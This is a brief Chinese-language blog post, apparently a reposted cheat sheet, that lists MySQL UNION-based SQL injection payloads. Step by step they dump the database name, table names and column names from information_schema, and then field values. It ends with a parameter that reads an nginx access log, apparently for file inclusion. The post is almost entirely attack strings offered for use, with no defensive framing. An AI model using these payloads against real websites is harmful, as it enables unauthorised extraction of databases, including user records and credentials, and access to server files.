本文主要是介绍mysql数据库,爆库、爆表、爆字段、爆值的语句,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
mysql数据库,爆库、爆表、爆字段、爆值的语句
爆库:
union select 1,2,3,database(); # 要看多少字段
爆表:
union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database(); #
爆字段:
union select 1,2,3,group_concat(column_name) from information_schema.columns where table_name="表名"; #
爆值:
union select 1,2,3,字段 from 表名; #
查日志?url=/var/log/nginx/access.log
这篇关于mysql数据库,爆库、爆表、爆字段、爆值的语句的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!